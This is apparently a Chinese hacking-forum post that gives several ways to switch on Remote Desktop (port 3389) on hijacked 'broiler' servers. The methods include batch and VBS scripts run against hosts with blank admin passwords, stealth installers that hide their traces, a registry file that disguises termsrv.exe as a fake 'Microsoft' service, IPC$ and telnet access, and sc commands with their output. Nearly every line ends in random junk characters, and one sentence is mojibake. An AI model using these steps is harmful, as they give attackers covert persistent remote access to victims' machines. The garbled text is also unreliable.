几种开3389端口的方法

[hide=60] 1.打开记事本，编辑内容如下： D=1:-aLP7  
echo [Components] > c:\sql .3>`yL  
echo TSEnable = on >> c:\sql iOY: a  
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q uJ-Q]yQ  
编辑好后存为BAT文件，上传至肉鸡，执行。这里值得注意的是要确定winnt是否在c盘，如果在其他盘则需要改动。 A\ARjSdb  
'^B[Krs'Z`  
2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05 StLFq6BO  
地址:www.netsill.com/rots.zip O{^8dwg  
使用方法： ~H`m"4zQ  
在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本，例如： ^G(U@-0..  
=d`w~iC  
c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项] MTXh-9DA  
,/2&HZd  
服务端口： 设置终端服务的服务端口。默认是3389。 !=Scpo_  
自动重起选项： 使用/r表示安装完成后自动重起目标使设置生效。 Qe4O N3X!  
使用/fr表示强制重起目标。（如果/r不行，可以允哉飧觯?BR>使用此参数时，端口设置不能忽略。 wtM1gYl^  
比如扫描到了一个有NT弱口令的服务器，IP地址是222.222.222.222，管理员帐户是administrator，密码为空 3qf?n5"8  
运行CMD（2000下的DOS），我们给它开终端！ CCDU5l$$  
命令如下！ #mKF)W  
cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr sbv2*fno5  
上面的命令应该可以理解吧？cscript reg.vbe这是命令，后面的是IP，然后是管理员帐户，接这是密码，因为222.222.222.222 这台服务器的管理员密码是空的，那就用双引号表示为空，再后面是端口，你可以任意设置终端的端口，/fr是重启命令（强制重启，一般我都用这个，你也可以 /r，这是普通重启） 59Lc-JJ  
p{|!LcSU$2  
脚本会判断目标系统类型，如果不是server及以上版本，就会提示你是否要取消。 f[}(E  
因为pro版不能安装终端服务。 %9vl  
如果你确信脚本判断错误，就继续安装好了。 DwmK?5p  
>PuQ{T I  
如果要对本地使用，IP地址为127.0.0.1或者一个点（用.表示），用户名和密码都为空（用""表示）。 hZ_@U?^  

q"(b}3  
脚本访问的目标的135端口，如果目标135端口未开放，或者WMI服务关闭，那么脚本就没用了。  )OHGg  
U45kA\[bZ  
:'`y}'  
3，下载3389自动安装程序-djshao正式版5.0 cl04fqX  
地址www.netsill.com/djshao.zip gcF:/@:Rm  
说明： !,lk>j.V  
解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyxs.exe上传到肉鸡的c:\winnt\temp下，然后进入c:\ winnt\temp目录执行djxyxs.exe解压缩文件，然后再执行解压缩出来的azzd.exe文件，等一会肉鸡会自动重启！重启后会出现终端服务！ 9]C%2!Ur,  
B/O0 ~y!n  
特点：1、不用修改注册表的安装路径，注册表会自动修改，安装完后会自动恢复到原来的安装路径，2、在后台安静模式运行，就算肉鸡旁有人也没有关系！3、在添加和删除中看不出终端服务被安装的痕迹，也就是启动终端前不会打钩，4、不会在肉鸡上留下你的上传文件，在安装完终端服务后会会自动删除你上传到c:\winnt\temp下的任何文件！5、不管肉鸡的winnt装在什么盘上都无所谓！6、安装完终端后会删除在管理工具中的终端快捷图标！7、在没有安装终端前，终端服务是被禁止的！安装终端后，终端服务被改为自动！但是如果在安装前终端服务是手动！安装后就可能还是手动！等重启后就不会打开服务！所以在软件中加了sc指令，等安装完后，不管终端服务是禁止还是手动还是自动，全部改为自动。8、自动检测肉鸡是不是服务器版，如果不是删除原文件，不执行安装，如果是服务器版就执行安装！9、支持非法内容,请删除韩繁四个版本的win2000服务器版！ +>3jMs~&  
-\<\OV:c*  
IJ]rVty  
4.下载DameWare NT Utilities 3.66.0.0 注册版 U7#C.Z  
地址www.netsill.com/dwmrcw36600.zip Gr-~&pm  
安装注册完毕后输入对方IP用户名密码，等待出现是否安装的对话框点是。 ,I6li7V  
复制启动后出现对方桌面。 5'\detV_  
在对方桌面进入控制面版，点添加或删除程序。进入后点添加/删除windows组件，找到终端服务，点际进入后在启动终端服务上打上勾。确定自动提示重起，重起后OK。 @eJ6UML"  
&NKb},~  
5o6X.sC8e  
５. %u}#|+8}  
60TM!\  
首先我们制作开启3389的工具 <$(y6+lY  
先把下面的注册表内容copy一份，另存为3389.reg注册表文件 }1 ,\*)5  
注册表内容： .^dtdFZ8,  
Windows Registry Editor Version 5.00 @AtJO>w  
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] (^oN, 7  
"Enabled"="0" `=V p 0tPI  
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] EDT9O  
"ShutdownWithoutLogon"="0" z~"Q_gme  
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] 5G2G<[p5oQ  
"EnableAdminTSRemote"=dword:00000001 t!-\:8n  
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] {oSdVRI  
"TSEnabled"=dword:00000001 N
j;5iy  
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] nuH=pIq6x  
"Start"=dword:00000002 /:tzSKq}  
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] fUMjLA|*I<  
"Hotkey"="1" *8r^!(Kj  
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] f$76p!pDa  
"Start"=dword:00000002 577
#A,O  
"ErrorControl"=dword:00000001 3n,jrX75u  
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ cO$xT;kK  
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ !>\&*h-Cm#  
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 5^D094J|^  
"ObjectName"="LocalSystem" ZIN1y;dJ  
"Type"=dword:00000010 nll=Vd[  
"Description"="Microsoft" GKc?  
"DisplayName"="Microsoft" 7KesfH?  
再把下面的内容保存为批处理文件3389.bat kXV
;J$1  
安装批处理内容： $Qz<:?D  
copy termsrv.exe eventlog.exe vHZq z<  
regedit.exe /s 3389.reg H#i,Ve'  
del 3389.reg L{&>,ww  
del 3389.exe V0NLwl O  
del 3389.bat wBDHhXi0  
用winrar制作成exe自解压缩包 0!-'4+"  
:i4AkBNK  
61.188.***.*** user:administrato pass:空 0K'{w]Q  
先使用工具letmein判断其操作系统 2?Y8hm  
letmein \\ip -all -d $l2`@ia"  
TsInternetUser (TsInternetUser)这个是2000的终端用户，现在可以判断其为2000server了 $PG
(>1e  
再使用终端登陆软件看看他的3389是不是已经开启了免了费事折腾 Qs '_\|/-  
应该没有开启了 /qKA1-R}4  
建立ipc连接 cLEd-{x  
copy工具过去 up{0ehr  
net use \\ip\ipc$ "pass" /user:name 4E2#krE%  
copy file \\ip\admin$\system32 {#st>%i  
用opentelnet开对方的telnet jzJQ/ZFS  
opentelnet \\ip name pass 1 99 4> uNH5  
用telnet进入 n}b{u@$  
进入到对方的winnt\system32\ c2t`i  
目录 R#3zGWr~  
解压缩3389.exe 3?K+wg s  
运行安装批处理3389.bat :zX^H9'E<(  
现在我们把对方重起一下，用reboot A!,c@Kv 3  
zMRa<G7  
E mg=,  
tm/=Oc1p  
,4S[<(T"  
7. t>Ye*eR*`U  
?N<,;~  
检查对方是否真的禁用了Terminal server Nyt*mbd5 {  
C:\>sc \\xxx.xxx.xxx.xxx qc termservice ~j>
yQ%[v  
[SC] GetServiceConfig SUCCESS O:sqm n  
SERVICE_NAME: termservice ] )iP?2{  
TYPE : 10 WIN32_OWN_PROCESS ~5&B#Sm[G  
START_TYPE : 4 DISABLED #K0/ >W  
ERROR_CONTROL : 1 NORMAL )w~1VcnJEp  
BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe tA^+RO4  
LOAD_ORDER_GROUP : T$`m!mQ4  
TAG : 0 %%F,G  
DISPLAY_NAME : Terminal Services Ell14Iki  
DEPENDENCIES : 'z^'+}iyv  
SERVICE_START_NAME : LocalSystem Ypl;jkHP  
仔细看 START_TYPE一项，显示对方该服务的启动模式为“DISABLED”也就是“禁用”。 ^^&H:q  
=@ acg0  
-<g[P_#  
C:\>sc \\xxx.xxx.xxx.xxx config termservice start= auto
7m 
ou  
[SC] ChangeServiceConfig SUCCESS 0Ix,c(%  
好了，现在我们已经把对方终端服务的启动模式修改成自动了。 r!1f>F*dt  
"f8,9@  
hP8w3gl
_  
0r_~LN^|[  
再检查一便对方终端服务的启动模式 Oe x  
C:\>sc \\TEST qc termservice ]h
~F%   
[SC] GetServiceConfig SUCCESS i9Beap/t$  
SERVICE_NAME: termservice 0J^Z)U>j  
TYPE : 10 WIN32_OWN_PROCESS w+"E{#N  
START_TYPE : 2 AUTO_START *Lxt{z`9  
ERROR_CONTROL : 1 NORMAL c0Bqm  
BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe wm^1Fn--  
LOAD_ORDER_GROUP : 
}-sh  
TAG : 0 SHs [te[  
DISPLAY_NAME : Terminal Services T*mR9 8i  
DEPENDENCIES : m_Pk$Vwx  
SERVICE_START_NAME : LocalSystem !yT=*Cj4  
qtdkK LT  
_h4]gZ  
4lR+nmAZ  
启动对方的终端服务 .71ZeLv*  
C:\>sc \\xxx.xxx.xxx.xxx start termservice gaQ E'qp>  
SERVICE_NAME: termservice W4$aX5ow$  
TYPE : 10 WIN32_OWN_PROCESS S!#5  
STATE : 2 START_PENDING 4i.&geXA.  
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN) @54$IhhT~  
WIN32_EXIT_CODE : 0 (0x0) )5n0P Zi  
SERVICE_EXIT_CODE : 0 (0x0) \9@}0}%`  
CHECKPOINT : 0x1 $W=)-X\>  
WAIT_HINT : 0x7530 vs$h&o>|  
qLN\>Z,3;  
h^_^)P+;  
C:\>sc \\xxx.xxx.xxx.xxx query termservice y9?*H?f,  
SERVICE_NAME: termservice Go1xyd:k  
TYPE : 10 WIN32_OWN_PROCESS R<_VWPlj  
STATE : 4 RUNNING 2q]ZI  
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN) C$K?4$  
WIN32_EXIT_CODE : 0 (0x0) J~xm[^0  
SERVICE_EXIT_CODE : 0 (0x0) `q\F C[W  
CHECKPOINT : 0x0 mi$C%~]5m  
WAIT_HINT : 0x0[/hide]